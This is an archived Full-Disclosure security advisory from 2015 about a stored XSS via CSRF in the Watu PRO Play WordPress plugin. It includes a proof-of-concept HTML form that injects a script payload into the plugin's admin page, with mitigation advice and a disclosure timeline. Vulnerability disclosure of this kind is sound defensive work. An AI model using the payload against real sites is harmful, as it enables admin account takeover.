lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <c71131285aec6c6b4a8f4596abd70ff0@security.dxw.com> Date: Tue, 1 Sep 2015 16:12:23 +0000 From: dxw Security <security@....com> To: fulldisclosure@...lists.org Subject: [FD] Stored XSS in Watu PRO Play allows unauthenticated attackers to do almost anything an admin can (WordPress plugin) Details ================ Software: Watu PRO Play Version: 1.9.2.1 Homepage: http://calendarscripts.info/watupro/modules.html#play Advisory report: https://security.dxw.com/advisories/stored-xss-in-watu-pro-play-allows-unauthenticated-attacker-to-do-almost-anything-an-admin-can/ CVE: Awaiting assignment CVSS: 5.8 (Medium; AV:N/AC:M/Au:N/C:P/I:P/A:N) Description ================ Stored XSS in Watu PRO Play allows unauthenticated attackers to do almost anything an admin can Vulnerability ================ An attacker able to convince an admin to visit a link of their choosing (e.g. via a phishing attack) is able to execute arbitrary JavaScript. This makes use of a CSRF vulnerability (no nonce protection on the levels form) Proof of concept ================ If a logged-in administrator user clicks the submit button on this form, a JavaScript alert will display on /wp-admin/admin.php?page=watuproplay_levels (in a real attack the form can be made to auto-submit using JavaScript): <form action=\"http://localhost/wp-admin/admin.php?page=watuproplay_levels&action=add\" method=\"POST\"> <input type=\"text\" name=\"name\" value=\"<script>alert(1)</script>\"> <input type=\"text\" name=\"ok\" value=\"1\"> <input type=\"submit\"> </form> Mitigations ================ Disable the plugin until a new version is released that fixes this bug Disclosure policy ================ dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/ Please contact us on security@....com to acknowledge this report if you received it via a third party (for example, plugins@...dpress.org) as they generally cannot communicate with us on your behalf. This vulnerability will be published if we do not receive a response to this report with 14 days. Timeline ================ 2015-08-11: Discovered 2015-08-26: Reported to vendor by email 2015-08-26: Requested CVE Discovered by dxw: ================ Tom Adams Please visit security.dxw.com for more information. _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists